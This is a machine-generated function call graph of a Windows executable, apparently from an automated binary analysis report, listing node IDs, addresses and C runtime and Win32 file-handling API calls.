_wcslen 87202->87204 87203->87144 87205 40f710 WideCharToMultiByte 87204->87205 87206 40f756 87205->87206 87207 40f728 87205->87207 87206->87144 87208 4115d7 52 API calls 87207->87208 87209 40f735 WideCharToMultiByte 87208->87209 87209->87144 87212 40f85d setSBCS _strlen 87210->87212 87213 40f7ab 87212->87213 87258 414db8 87212->87258 87214 4149c2 87213->87214 87273 414904 87214->87273 87216 40f7e9 87216->87149 87217 40f5c0 87216->87217 87221 40f5cd _strcat __write_nolock _memmove 87217->87221 87218 414d04 __fread_nolock 61 API calls 87218->87221 87219 40f691 __tzset_nolock 87219->87151 87221->87218 87221->87219 87224 425d11 87221->87224 87361 4150d1 87221->87361 87222 4150d1 _fseek 81 API calls 87223 425d33 87222->87223 87225 414d04 __fread_nolock 61 API calls 87223->87225 87224->87222 87225->87219 87227 414a52 _flsall 87226->87227 87228 414a64 87227->87228 87229 414a79 87227->87229 87501 417f77 46 API calls __getptd_noexit 87228->87501 87232 415471 __lock_file 47 API calls 87229->87232 87237 414a74 _flsall 87229->87237 87231 414a69 87502 417f25 10 API calls __write_nolock 87231->87502 87233 414a92 87232->87233 87485 4149d9 87233->87485 87237->87156 87570 414c76 87239->87570 87241 414d1c 87242 44afef 87241->87242 87738 442c5a 87242->87738 87244 44b00d 87244->87158 87246 414fee _flsall 87245->87246 87247 414ffa 87246->87247 87248 41500f 87246->87248 87742 417f77 46 API calls __getptd_noexit 87247->87742 87250 415471 __lock_file 47 API calls 87248->87250 87252 415017 87250->87252 87251 414fff 87743 417f25 10 API calls __write_nolock 87251->87743 87254 414e4e __ftell_nolock 51 API calls 87252->87254 87255 415024 87254->87255 87744 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 87255->87744 87257 41500a _flsall 87257->87160 87259 414dd6 87258->87259 87260 414deb 87258->87260 87269 417f77 46 API calls __getptd_noexit 87259->87269 87260->87259 87262 414df2 87260->87262 87271 41b91b 79 API calls 11 library calls 87262->87271 87263 414ddb 87270 417f25 10 API calls __write_nolock 87263->87270 87265 414e18 87267 414de6 87265->87267 87272 418f98 77 API calls 5 library calls 87265->87272 87267->87212 87269->87263 87270->87267 87271->87265 87272->87267 87276 414910 _flsall 87273->87276 87274 414923 87329 417f77 46 API calls __getptd_noexit 87274->87329 87276->87274 87278 414951 87276->87278 87277 414928 87330 417f25 10 API calls __write_nolock 87277->87330 87292 41d4d1 87278->87292 87281 414956 87282 41496a 87281->87282 87283 41495d 87281->87283 87285 414992 87282->87285 87286 414972 87282->87286 87331 417f77 46 API calls __getptd_noexit 87283->87331 87309 41d218 87285->87309 87332 417f77 46 API calls __getptd_noexit 87286->87332 87289 414933 _flsall @_EH4_CallFilterFunc@8 87289->87216 87293 41d4dd _flsall 87292->87293 87294 4182cb __lock 46 API calls 87293->87294 87295 41d4eb 87294->87295 87296 41d567 87295->87296 87304 418209 __mtinitlocknum 46 API calls 87295->87304 87307 41d560 87295->87307 87337 4154b2 47 API calls __lock 87295->87337 87338 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87295->87338 87298 416b04 __malloc_crt 46 API calls 87296->87298 87300 41d56e 87298->87300 87299 41d5f0 _flsall 87299->87281 87301 41d57c InitializeCriticalSectionAndSpinCount 87300->87301 87300->87307 87302 41d59c 87301->87302 87303 41d5af EnterCriticalSection 87301->87303 87306 413748 _free 46 API calls 87302->87306 87303->87307 87304->87295 87306->87307 87334 41d5fb 87307->87334 87310 41d23a 87309->87310 87311 41d255 87310->87311 87322 41d26c __wopenfile 87310->87322 87343 417f77 46 API calls __getptd_noexit 87311->87343 87313 41d25a 87344 417f25 10 API calls __write_nolock 87313->87344 87314 41d47a 87348 417f77 46 API calls __getptd_noexit 87314->87348 87315 41d48c 87340 422bf9 87315->87340 87319 41d47f 87349 417f25 10 API calls __write_nolock 87319->87349 87320 41499d 87333 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 87320->87333 87322->87314 87328 41d421 87322->87328 87345 41341f 58 API calls 2 library calls 87322->87345 87324 41d41a 87324->87328 87346 41341f 58 API calls 2 library calls 87324->87346 87326 41d439 87326->87328 87347 41341f 58 API calls 2 library calls 87326->87347 87328->87314 87328->87315 87329->87277 87330->87289 87331->87289 87332->87289 87333->87289 87339 4181f2 LeaveCriticalSection 87334->87339 87336 41d602 87336->87299 87337->87295 87338->87295 87339->87336 87350 422b35 87340->87350 87342 422c14 87342->87320 87343->87313 87344->87320 87345->87324 87346->87326 87347->87328 87348->87319 87349->87320 87352 422b41 _flsall 87350->87352 87351 422b54 87353 417f77 __write_nolock 46 API calls 87351->87353 87352->87351 87354 422b8a 87352->87354 87355 422b59 87353->87355 87357 422400 __tsopen_nolock 109 API calls 87354->87357 87356 417f25 __write_nolock 10 API calls 87355->87356 87360 422b63 _flsall 87356->87360 87358 422ba4 87357->87358 87359 422bcb __wsopen_helper LeaveCriticalSection 87358->87359 87359->87360 87360->87342 87363 4150dd _flsall 87361->87363 87362 4150e9 87392 417f77 46 API calls __getptd_noexit 87362->87392 87363->87362 87364 41510f 87363->87364 87374 415471 87364->87374 87367 4150ee 87393 417f25 10 API calls __write_nolock 87367->87393 87373 4150f9 _flsall 87373->87221 87375 415483 87374->87375 87376 4154a5 EnterCriticalSection 87374->87376 87375->87376 87377 41548b 87375->87377 87378 415117 87376->87378 87379 4182cb __lock 46 API calls 87377->87379 87380 415047 87378->87380 87379->87378 87381 415067 87380->87381 87382 415057 87380->87382 87387 415079 87381->87387 87395 414e4e 87381->87395 87450 417f77 46 API calls __getptd_noexit 87382->87450 87386 41505c 87394 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 87386->87394 87412 41443c 87387->87412 87390 4150b9 87425 41e1f4 87390->87425 87392->87367 87393->87373 87394->87373 87396 414e61 87395->87396 87397 414e79 87395->87397 87451 417f77 46 API calls __getptd_noexit 87396->87451 87399 414139 __flswbuf 46 API calls 87397->87399 87401 414e80 87399->87401 87400 414e66 87452 417f25 10 API calls __write_nolock 87400->87452 87403 41e1f4 __write 51 API calls 87401->87403 87404 414e97 87403->87404 87405 414f09 87404->87405 87407 414ec9 87404->87407 87411 414e71 87404->87411 87453 417f77 46 API calls __getptd_noexit 87405->87453 87408 41e1f4 __write 51 API calls 87407->87408 87407->87411 87409 414f64 87408->87409 87410 41e1f4 __write 51 API calls 87409->87410 87409->87411 87410->87411 87411->87387 87413 414455 87412->87413 87417 414477 87412->87417 87414 414139 __flswbuf 46 API calls 87413->87414 87413->87417 87415 414470 87414->87415 87454 41b7b2 77 API calls 4 library calls 87415->87454 87418 414139 87417->87418 87419 414145 87418->87419 87420 41415a 87418->87420 87455 417f77 46 API calls __getptd_noexit 87419->87455 87420->87390 87422 41414a 87456 417f25 10 API calls __write_nolock 87422->87456 87424 414155 87424->87390 87426 41e200 _flsall 87425->87426 87427 41e223 87426->87427 87428 41e208 87426->87428 87429 41e22f 87427->87429 87434 41e269 87427->87434 87477 417f8a 46 API calls __getptd_noexit 87428->87477 87479 417f8a 46 API calls __getptd_noexit 87429->87479 87432 41e20d 87478 417f77 46 API calls __getptd_noexit 87432->87478 87433 41e234 87480 417f77 46 API calls __getptd_noexit 87433->87480 87457 41ae56 87434->87457 87438 41e23c 87481 417f25 10 API calls __write_nolock 87438->87481 87439 41e26f 87441 41e291 87439->87441 87442 41e27d 87439->87442 87482 417f77 46 API calls __getptd_noexit 87441->87482 87467 41e17f 87442->87467 87444 41e215 _flsall 87444->87386 87446 41e296 87483 417f8a 46 API calls __getptd_noexit 87446->87483 87447 41e289 87484 41e2c0 LeaveCriticalSection __unlock_fhandle 87447->87484 87450->87386 87451->87400 87452->87411 87453->87411 87454->87417 87455->87422 87456->87424 87458 41ae62 _flsall 87457->87458 87459 41aebc 87458->87459 87462 4182cb __lock 46 API calls 87458->87462 87460 41aec1 EnterCriticalSection 87459->87460 87461 41aede _flsall 87459->87461 87460->87461 87461->87439 87463 41ae8e 87462->87463 87464 41ae97 InitializeCriticalSectionAndSpinCount 87463->87464 87465 41aeaa 87463->87465 87464->87465 87466 41aeec ___lock_fhandle LeaveCriticalSection 87465->87466 87466->87459 87468 41aded __close_nolock 46 API calls 87467->87468 87469 41e18e 87468->87469 87470 41e1a4 SetFilePointer 87469->87470 87471 41e194 87469->87471 87472 41e1bb GetLastError 87470->87472 87474 41e1c3 87470->87474 87473 417f77 __write_nolock 46 API calls 87471->87473 87472->87474 87475 41e199 87473->87475 87474->87475 87476 417f9d __dosmaperr 46 API calls 87474->87476 87475->87447 87476->87475 87477->87432 87478->87444 87479->87433 87480->87438 87481->87444 87482->87446 87483->87447 87484->87444 87486 4149ea 87485->87486 87487 4149fe 87485->87487 87531 417f77 46 API calls __getptd_noexit 87486->87531 87489 4149fa 87487->87489 87491 41443c __flush 77 API calls 87487->87491 87503 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 87489->87503 87490 4149ef 87532 417f25 10 API calls __write_nolock 87490->87532 87493 414a0a 87491->87493 87504 41d8c2 87493->87504 87496 414139 __flswbuf 46 API calls 87497 414a18 87496->87497 87508 41d7fe 87497->87508 87499 414a1e 87499->87489 87500 413748 _free 46 API calls 87499->87500 87500->87489 87501->87231 87502->87237 87503->87237 87505 41d8d2 87504->87505 87507 414a12 87504->87507 87506 413748 _free 46 API calls 87505->87506 87505->87507 87506->87507 87507->87496 87509 41d80a _flsall 87508->87509 87510 41d812 87509->87510 87511 41d82d 87509->87511 87548 417f8a 46 API calls __getptd_noexit 87510->87548 87513 41d839 87511->87513 87518 41d873 87511->87518 87550 417f8a 46 API calls __getptd_noexit 87513->87550 87514 41d817 87549 417f77 46 API calls __getptd_noexit 87514->87549 87517 41d83e 87551 417f77 46 API calls __getptd_noexit 87517->87551 87519 41ae56 ___lock_fhandle 48 API calls 87518->87519 87521 41d879 87519->87521 87523 41d893 87521->87523 87524 41d887 87521->87524 87522 41d846 87552 417f25 10 API calls __write_nolock 87522->87552 87553 417f77 46 API calls __getptd_noexit 87523->87553 87533 41d762 87524->87533 87528 41d81f _flsall 87528->87499 87529 41d88d 87554 41d8ba LeaveCriticalSection __unlock_fhandle 87529->87554 87531->87490 87532->87489 87555 41aded 87533->87555 87535 41d772 87536 41d7c8 87535->87536 87538 41d7a6 87535->87538 87541 41aded __close_nolock 46 API calls 87535->87541 87568 41ad67 47 API calls __write_nolock 87536->87568 87538->87536 87539 41aded __close_nolock 46 API calls 87538->87539 87542 41d7b2 CloseHandle 87539->87542 87540 41d7d0 87543 41d7f2 87540->87543 87569 417f9d 46 API calls 2 library calls 87540->87569 87544 41d79d 87541->87544 87542->87536 87545 41d7be GetLastError 87542->87545 87543->87529 87547 41aded __close_nolock 46 API calls 87544->87547 87545->87536 87547->87538 87548->87514 87549->87528 87550->87517 87551->87522 87552->87528 87553->87529 87554->87528 87556 41ae12 87555->87556 87557 41adfa 87555->87557 87560 417f8a __write_nolock 46 API calls 87556->87560 87563 41ae51 87556->87563 87558 417f8a __write_nolock 46 API calls 87557->87558 87559 41adff 87558->87559 87561 417f77 __write_nolock 46 API calls 87559->87561 87562 41ae23 87560->87562 87564 41ae07 87561->87564 87565 417f77 __write_nolock 46 API calls 87562->87565 87563->87535 87564->87535 87566 41ae2b 87565->87566 87567 417f25 __write_nolock 10 API calls 87566->87567 87567->87564 87568->87540 87569->87543 87571 414c82 _flsall 87570->87571 87572 414cc3 87571->87572 87573 414c96 setSBCS 87571->87573 87574 414cbb _flsall 87571->87574 87575 415471 __lock_file 47 API calls 87572->87575 87597 417f77 46 API calls __getptd_noexit 87573->87597 87574->87241 87577 414ccb 87575->87577 87583 414aba 87577->87583 87578 414cb0 87598 417f25 10 API calls __write_nolock 87578->87598 87584 414af2 87583->87584 87587 414ad8 setSBCS 87583->87587 87599 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 87584->87599 87585 414ae2 87650 417f77 46 API calls __getptd_noexit 87585->87650 87587->87584 87587->87585 87590 414b2d 87587->87590 87590->87584 87591 414139 __flswbuf 46 API calls 87590->87591 87594 414c38 setSBCS 87590->87594 87600 41dfcc 87590->87600 87630 41d8f3 87590->87630 87652 41e0c2 46 API calls 3 library calls 87590->87652 87591->87590 87653 417f77 46 API calls __getptd_noexit 87594->87653 87596 414ae7 87651 417f25 10 API calls __write_nolock 87596->87651 87597->87578 87598->87574 87599->87574 87601 41dfd8 _flsall 87600->87601 87602 41dfe0 87601->87602 87603 41dffb 87601->87603 87723 417f8a 46 API calls __getptd_noexit 87602->87723 87605 41e007 87603->87605 87608 41e041 87603->87608 87725 417f8a 46 API calls __getptd_noexit 87605->87725 87606 41dfe5 87724 417f77 46 API calls __getptd_noexit 87606->87724 87611 41e063 87608->87611 87612 41e04e 87608->87612 87610 41e00c 87726 417f77 46 API calls __getptd_noexit 87610->87726 87616 41ae56 ___lock_fhandle 48 API calls 87611->87616 87728 417f8a 46 API calls __getptd_noexit 87612->87728 87614 41e014 87727 417f25 10 API calls __write_nolock 87614->87727 87618 41e069 87616->87618 87617 41e053 87729 417f77 46 API calls __getptd_noexit 87617->87729 87621 41e077 87618->87621 87622 41e08b 87618->87622 87654 41da15 87621->87654 87730 417f77 46 API calls __getptd_noexit 87622->87730 87624 41dfed _flsall 87624->87590 87626 41e083 87732 41e0ba LeaveCriticalSection __unlock_fhandle 87626->87732 87627 41e090 87731 417f8a 46 API calls __getptd_noexit 87627->87731 87631 41d900 87630->87631 87635 41d915 87630->87635 87736 417f77 46 API calls __getptd_noexit 87631->87736 87633 41d905 87737 417f25 10 API calls __write_nolock 87633->87737 87636 41d910 87635->87636 87637 41d94a 87635->87637 87733 420603 87635->87733 87636->87590 87639 414139 __flswbuf 46 API calls 87637->87639 87640 41d95e 87639->87640 87641 41dfcc __read 59 API calls 87640->87641 87642 41d965 87641->87642 87642->87636 87643 414139 __flswbuf 46 API calls 87642->87643 87644 41d988 87643->87644 87644->87636 87645 414139 __flswbuf 46 API calls 87644->87645 87646 41d994 87645->87646 87646->87636 87647 414139 __flswbuf 46 API calls 87646->87647 87648 41d9a1 87647->87648 87649 414139 __flswbuf 46 API calls 87648->87649 87649->87636 87650->87596 87651->87584 87652->87590 87653->87596 87655 41da31 87654->87655 87656 41da4c 87654->87656 87657 417f8a __write_nolock 46 API calls 87655->87657 87658 41da5b 87656->87658 87660 41da7a 87656->87660 87659 41da36 87657->87659 87661 417f8a __write_nolock 46 API calls 87658->87661 87663 417f77 __write_nolock 46 API calls 87659->87663 87662 41da98 87660->87662 87677 41daac 87660->87677 87664 41da60 87661->87664 87665 417f8a __write_nolock 46 API calls 87662->87665 87666 41da3e 87663->87666 87668 417f77 __write_nolock 46 API calls 87664->87668 87670 41da9d 87665->87670 87666->87626 87667 41db02 87669 417f8a __write_nolock 46 API calls 87667->87669 87671 41da67 87668->87671 87672 41db07 87669->87672 87673 417f77 __write_nolock 46 API calls 87670->87673 87674 417f25 __write_nolock 10 API calls 87671->87674 87675 417f77 __write_nolock 46 API calls 87672->87675 87676 41daa4 87673->87676 87674->87666 87675->87676 87680 417f25 __write_nolock 10 API calls 87676->87680 87677->87666 87677->87667 87678 41dae1 87677->87678 87679 41db1b 87677->87679 87678->87667 87681 41daec ReadFile 87678->87681 87683 416b04 __malloc_crt 46 API calls 87679->87683 87680->87666 87684 41dc17 87681->87684 87685 41df8f GetLastError 87681->87685 87686 41db31 87683->87686 87684->87685 87691 41dc2b 87684->87691 87687 41de16 87685->87687 87688 41df9c 87685->87688 87689 41db59 87686->87689 87690 41db3b 87686->87690 87695 417f9d __dosmaperr 46 API calls 87687->87695 87702 41dd9b 87687->87702 87693 417f77 __write_nolock 46 API calls 87688->87693 87692 420494 __lseeki64_nolock 48 API calls 87689->87692 87694 417f77 __write_nolock 46 API calls 87690->87694 87691->87702 87704 41de5b 87691->87704 87705 41dc47 87691->87705 87697 41db67 87692->87697 87698 41dfa1 87693->87698 87696 41db40 87694->87696 87695->87702 87699 417f8a __write_nolock 46 API calls 87696->87699 87697->87681 87700 417f8a __write_nolock 46 API calls 87698->87700 87699->87666 87700->87702 87701 413748 _free 46 API calls 87701->87666 87702->87666 87702->87701 87703 41ded0 ReadFile 87708 41deef GetLastError 87703->87708 87716 41def9 87703->87716 87704->87702 87704->87703 87706 41dcab ReadFile 87705->87706 87711 41dd28 87705->87711 87707 41dcc9 GetLastError 87706->87707 87715 41dcd3 87706->87715 87707->87705 87707->87715 87708->87704 87708->87716 87709 41ddec MultiByteToWideChar 87709->87702 87710 41de10 GetLastError 87709->87710 87710->87687 87711->87702 87712 41dda3 87711->87712 87713 41dd96 87711->87713 87718 41dd60 87711->87718 87712->87718 87719 41ddda 87712->87719 87714 417f77 __write_nolock 46 API calls 87713->87714 87714->87702 87715->87705 87720 420494 __lseeki64_nolock 48 API calls 87715->87720 87716->87704 87717 420494 __lseeki64_nolock 48 API calls 87716->87717 87717->87716 87718->87709 87721 420494 __lseeki64_nolock 48 API calls 87719->87721 87720->87715 87722 41dde9 87721->87722 87722->87709 87723->87606 87724->87624 87725->87610 87726->87614 87727->87624 87728->87617 87729->87614 87730->87627 87731->87626 87732->87624 87734 416b04 __malloc_crt 46 API calls 87733->87734 87735 420618 87734->87735 87735->87637 87736->87633 87737->87636 87741 4148b3 GetSystemTimeAsFileTime __aulldiv 87738->87741 87740 442c6b 87740->87244 87741->87740 87742->87251 87743->87257 87744->87257 87748 45272f __tzset_nolock _wcscpy 87745->87748 87746 4528a4 87746->87166 87746->87167 87747 414d04 61 API calls __fread_nolock 87747->87748 87748->87746 87748->87747 87749 44afef GetSystemTimeAsFileTime 87748->87749 87750 4150d1 81 API calls _fseek 87748->87750 87749->87748 87750->87748 87752 44b1bc 87751->87752 87753 44b1ca 87751->87753 87754 4149c2 116 API calls 87752->87754 87755 44b1e1 87753->87755 87756 44b1d8 87753->87756 87757 4149c2 116 API calls 87753->87757 87754->87753 87786 4321a4 87755->87786 87756->87195 87759 44b2db 87757->87759 87759->87755 87761 44b2e9 87759->87761 87760 44b224 87762 44b253 87760->87762 87763 44b228 87760->87763 87764 44b2f6 87761->87764 87767 414a46 __fcloseall 82 API calls 87761->87767 87790 43213d 87762->87790 87766 44b235 87763->87766 87769 414a46 __fcloseall 82 API calls 87763->87769 87764->87195 87770 44b245 87766->87770 87773 414a46 __fcloseall 82 API calls 87766->87773 87767->87764 87768 44b25a 87771 44b260 87768->87771 87772 44b289 87768->87772 87769->87766 87770->87195 87774 44b26d 87771->87774 87776 414a46 __fcloseall 82 API calls 87771->87776 87800 44b0bf 87 API calls 87772->87800 87773->87770 87777 44b27d 87774->87777 87779 414a46 __fcloseall 82 API calls 87774->87779 87776->87774 87777->87195 87778 44b28f 87801 4320f8 46 API calls _free 87778->87801 87779->87777 87781 44b2a2 87784 44b2b2 87781->87784 87785 414a46 __fcloseall 82 API calls 87781->87785 87782 44b295 87782->87781 87783 414a46 __fcloseall 82 API calls 87782->87783 87783->87781 87784->87195 87785->87784 87787 4321b4 __tzset_nolock _memmove 87786->87787 87788 4321cb 87786->87788 87787->87760 87789 414d04 __fread_nolock 61 API calls 87788->87789 87789->87787 87791 4135bb _malloc 46 API calls 87790->87791 87792 432150 87791->87792 87793 4135bb _malloc 46 API calls 87792->87793 87794 432162 87793->87794 87795 4135bb _malloc 46 API calls 87794->87795 87796 432174 87795->87796 87799 432189 87796->87799 87802 4320f8 46 API calls _free 87796->87802 87798 432198 87798->87768 87799->87768 87800->87778 87801->87782 87802->87798 87803->87097 87804->87098 87805->87114 87806->87114 87807->87114 87808->87108 87809->87114 87810->87114 87811->87121 87812->87131 87813->87130 87814->87130 87864 410160 87815->87864 87817 41012f GetFullPathNameW 87818 410147 moneypunct 87817->87818 87818->86952 87820 4102cb SHGetDesktopFolder 87819->87820 87823 410333 _wcsncpy 87819->87823 87821 4102e0 _wcsncpy 87820->87821 87820->87823 87822 41031c SHGetPathFromIDListW 87821->87822 87821->87823 87822->87823 87823->86955 87825 425f4a 87824->87825 87826 4101bb 87824->87826 87829 4114ab __wcsicoll 58 API calls 87825->87829 87832 425f6e 87825->87832 87827 410160 52 API calls 87826->87827 87828 4101c7 87827->87828 87868 410200 52 API calls 2 library calls 87828->87868 87829->87825 87831 4101d6 87869 410200 52 API calls 2 library calls 87831->87869 87832->86957 87834 4101e9 87834->86957 87836 40f760 128 API calls 87835->87836 87837 40f584 87836->87837 87838 429335 87837->87838 87839 40f58c 87837->87839 87842 4528bd 118 API calls 87838->87842 87840 40f598 87839->87840 87841 429358 87839->87841 87894 4033c0 113 API calls 7 library calls 87840->87894 87895 434034 86 API calls _wprintf 87841->87895 87845 42934b 87842->87845 87848 429373 87845->87848 87849 42934f 87845->87849 87846 429369 87846->87848 87847 40f5b4 87847->86954 87850 4115d7 52 API calls 87848->87850 87851 431e58 82 API calls 87849->87851 87858 4293c5 moneypunct 87850->87858 87851->87841 87852 42959c 87853 413748 _free 46 API calls 87852->87853 87854 4295a5 87853->87854 87855 431e58 82 API calls 87854->87855 87856 4295b1 87855->87856 87858->87852 87861 401b10 52 API calls 87858->87861 87870 444af8 87858->87870 87873 44b41c 87858->87873 87880 402780 87858->87880 87888 4022d0 87858->87888 87896 44c7dd 64 API calls 3 library calls 87858->87896 87861->87858 87865 410167 _wcslen 87864->87865 87866 4115d7 52 API calls 87865->87866 87867 41017e _wcscpy 87866->87867 87867->87817 87868->87831 87869->87834 87871 4115d7 52 API calls 87870->87871 87872 444b27 _memmove 87871->87872 87872->87858 87874 44b429 87873->87874 87875 4115d7 52 API calls 87874->87875 87876 44b440 87875->87876 87877 44b45e 87876->87877 87878 401b10 52 API calls 87876->87878 87877->87858 87879 44b453 87878->87879 87879->87858 87881 402827 87880->87881 87884 402790 moneypunct _memmove 87880->87884 87883 4115d7 52 API calls 87881->87883 87882 4115d7 52 API calls 87885 402797 87882->87885 87883->87884 87884->87882 87886 4027bd 87885->87886 87887 4115d7 52 API calls 87885->87887 87886->87858 87887->87886 87889 4022e0 87888->87889 87891 40239d 87888->87891 87890 4115d7 52 API calls 87889->87890 87889->87891 87892 402320 moneypunct 87889->87892 87890->87892 87891->87858 87892->87891 87893 4115d7 52 API calls 87892->87893 87893->87892 87894->87847 87895->87846 87896->87858 87898 402539 moneypunct 87897->87898 87899 402417 87897->87899 87898->86961 87899->87898 87900 4115d7 52 API calls 87899->87900 87901 402443 87900->87901 87902 4115d7 52 API calls 87901->87902 87903 4024b4 87902->87903 87903->87898 87905 4022d0 52 API calls 87903->87905 87926 402880 95 API calls 2 library calls 87903->87926 87905->87903 87911 401566 87906->87911 87907 401794 87927 40e9a0 90 API calls 87907->87927 87910 4010a0 52 API calls 87910->87911 87911->87907 87911->87910 87912 40167a 87911->87912 87913 4017c0 87912->87913 87928 45e737 90 API calls 3 library calls 87912->87928 87913->86963 87915 40bc70 52 API calls 87914->87915 87924 40d451 87915->87924 87916 40d50f 87931 410600 52 API calls 87916->87931 87918 427c01 87932 45e737 90 API calls 3 library calls 87918->87932 87919 40e0a0 52 API calls 87919->87924 87921 401b10 52 API calls 87921->87924 87922 40d519 87922->86966 87924->87916 87924->87918 87924->87919 87924->87921 87924->87922 87929 40f310 53 API calls 87924->87929 87930 40d860 91 API calls 87924->87930 87926->87903 87927->87912 87928->87913 87929->87924 87930->87924 87931->87922 87932->87922 87933->86980 87934->86979 87936 42c5fe 87935->87936 87951 4091c6 87935->87951 87937 40bc70 52 API calls 87936->87937 87936->87951 87938 42c64e InterlockedIncrement 87937->87938 87939 42c665 87938->87939 87945 42c697 87938->87945 87942 42c672 InterlockedDecrement Sleep InterlockedIncrement 87939->87942 87939->87945 87940 42c737 InterlockedDecrement 87941 42c74a 87940->87941 87944 408f40 VariantClear 87941->87944 87942->87939 87942->87945 87943 42c731 87943->87940 87947 42c752 87944->87947 87945->87940 87945->87943 88219 408e80 87945->88219 88228 410c60 VariantClear moneypunct 87947->88228 87951->87042 87952 42c6db 87953 402160 52 API calls 87952->87953 87954 42c6e5 87953->87954 88224 45340c 85 API calls 87954->88224 87956 42c6f1 88225 40d200 52 API calls 2 library calls 87956->88225 87958 42c6fb 88226 465124 53 API calls 87958->88226 87960 42c715 87961 42c76a 87960->87961 87962 42c719 87960->87962 87963 401b10 52 API calls 87961->87963 88227 46fe32 VariantClear 87962->88227 87965 42c77e 87963->87965 87966 401980 53 API calls 87965->87966 87972 42c796 87966->87972 87967 42c812 88230 46fe32 VariantClear 87967->88230 87969 42c82a InterlockedDecrement 88231 46ff07 54 API calls 87969->88231 87971 42c864 88232 45e737 90 API calls 3 library calls 87971->88232 87972->87967 87972->87971 88229 40ba10 52 API calls 2 library calls 87972->88229 87973 42c9ec 88275 47d33e 329 API calls 87973->88275 87977 42c9fe 88276 46feb1 VariantClear VariantClear 87977->88276 87979 401980 53 API calls 87989 42c849 87979->87989 87980 408f40 VariantClear 87980->87989 87981 42ca08 87983 401b10 52 API calls 87981->87983 87982 402780 52 API calls 87982->87989 87985 42ca15 87983->87985 87984 408f40 VariantClear 87986 42c891 87984->87986 87987 40c2c0 52 API calls 87985->87987 88233 410c60 VariantClear moneypunct 87986->88233 87990 42c874 87987->87990 87989->87973 87989->87979 87989->87980 87989->87982 88234 40a780 87989->88234 87990->87984 87992 42ca59 87990->87992 87992->87992 87994 40afc4 87993->87994 87995 40b156 87993->87995 87996 40afd5 87994->87996 87997 42d1e3 87994->87997 88286 45e737 90 API calls 3 library calls 87995->88286 88001 40a780 192 API calls 87996->88001 88015 40b11a moneypunct 87996->88015 88287 45e737 90 API calls 3 library calls 87997->88287 88000 42d1f8 88006 408f40 VariantClear 88000->88006 88004 40b00a 88001->88004 88002 40b143 88002->87042 88004->88000 88007 40b012 88004->88007 88005 42d4db 88005->88005 88006->88002 88008 40b04a 88007->88008 88009 40b094 moneypunct 88007->88009 88011 42d231 VariantClear 88007->88011 88017 40b05c moneypunct 88008->88017 88288 40e270 VariantClear moneypunct 88008->88288 88010 40b108 88009->88010 88014 42d425 moneypunct 88009->88014 88010->88015 88289 40e270 VariantClear moneypunct 88010->88289 88011->88017 88012 42d45a VariantClear 88012->88015 88014->88012 88014->88015 88015->88002 88290 45e737 90 API calls 3 library calls 88015->88290 88016 4115d7 52 API calls 88016->88009 88017->88009 88017->88016 88020 408fff 88019->88020 88039 40900d 88019->88039 88291 403ea0 52 API calls __cinit 88020->88291 88023 42c3f6 88294 45e737 90 API calls 3 library calls 88023->88294 88025 42c44a 88296 45e737 90 API calls 3 library calls 88025->88296 88026 40a780 192 API calls 88026->88039 88027 42c47b 88297 451b42 61 API calls 88027->88297 88031 42c4cb 88299 47faae 231 API calls 88031->88299 88032 42c564 88033 408f40 VariantClear 88032->88033 88049 4090f2 moneypunct 88033->88049 88034 42c491 88034->88049 88298 45e737 90 API calls 3 library calls 88034->88298 88036 42c548 88302 45e737 90 API calls 3 library calls 88036->88302 88037 42c4da 88037->88049 88300 45e737 90 API calls 3 library calls 88037->88300 88038 409112 88038->88036 88047 40912b 88038->88047 88039->88023 88039->88025 88039->88026 88039->88027 88039->88031 88039->88032 88039->88036 88039->88038 88040 4090df 88039->88040 88042 42c528 88039->88042 88044 4090ea 88039->88044 88039->88049 88293 4534e3 52 API calls 88039->88293 88295 40c4e0 192 API calls 88039->88295 88040->88044 88045 408e80 VariantClear 88040->88045 88301 45e737 90 API calls 3 library calls 88042->88301 88050 408f40 VariantClear 88044->88050 88045->88044 88047->88049 88292 403e10 53 API calls 88047->88292 88049->87042 88050->88049 88052 40914b 88053 408f40 VariantClear 88052->88053 88053->88049 88303 408d90 88054->88303 88056 429778 88332 410c60 VariantClear moneypunct 88056->88332 88058 429780 88059 408cf9 88059->88056 88060 42976c 88059->88060 88062 408d2d 88059->88062 88331 45e737 90 API calls 3 library calls 88060->88331 88319 403d10 88062->88319 88065 408d71 moneypunct 88065->87042 88066 408d45 moneypunct 88066->88065 88067 408f40 VariantClear 88066->88067 88067->88066 88069 4096c6 _wcslen 88068->88069 88070 4115d7 52 API calls 88069->88070 88132 40a70c moneypunct _memmove 88069->88132 88071 4096fa _memmove 88070->88071 88073 4115d7 52 API calls 88071->88073 88072 4013a0 52 API calls 88075 4297aa 88072->88075 88074 40971b 88073->88074 88076 409749 CharUpperBuffW 88074->88076 88079 40976a moneypunct 88074->88079 88074->88132 88077 4115d7 52 API calls 88075->88077 88076->88079 88118 4297d1 _memmove 88077->88118 88127 4097e5 moneypunct 88079->88127 88610 47dcbb 194 API calls 88079->88610 88081 408f40 VariantClear 88082 42ae92 88081->88082 88637 410c60 VariantClear moneypunct 88082->88637 88084 42aea4 88085 409aa2 88087 4115d7 52 API calls 88085->88087 88092 409afe 88085->88092 88085->88118 88086 40a689 88089 4115d7 52 API calls 88086->88089 88087->88092 88088 4115d7 52 API calls 88088->88127 88105 40a6af moneypunct _memmove 88089->88105 88090 409b2a 88094 429dbe 88090->88094 88154 409b4d moneypunct _memmove 88090->88154 88618 40b400 VariantClear VariantClear moneypunct 88090->88618 88091 40c2c0 52 API calls 88091->88127 88092->88090 88093 4115d7 52 API calls 88092->88093 88095 429d31 88093->88095 88100 429dd3 88094->88100 88619 40b400 VariantClear VariantClear moneypunct 88094->88619 88099 429d42 88095->88099 88615 44a801 52 API calls 88095->88615 88096 429a46 VariantClear 88096->88127 88097 409fd2 88102 40a045 88097->88102 88156 42a3f5 88097->88156 88109 40e0a0 52 API calls 88099->88109 88100->88154 88620 40e1c0 VariantClear moneypunct 88100->88620 88107 4115d7 52 API calls 88102->88107 88103 408f40 VariantClear 88103->88127 88112 4115d7 52 API calls 88105->88112 88113 40a04c 88107->88113 88114 429d57 88109->88114 88112->88132 88117 40a0a7 88113->88117 88121 4091e0 315 API calls 88113->88121 88616 453443 52 API calls 88114->88616 88116 42a42f 88624 45e737 90 API calls 3 library calls 88116->88624 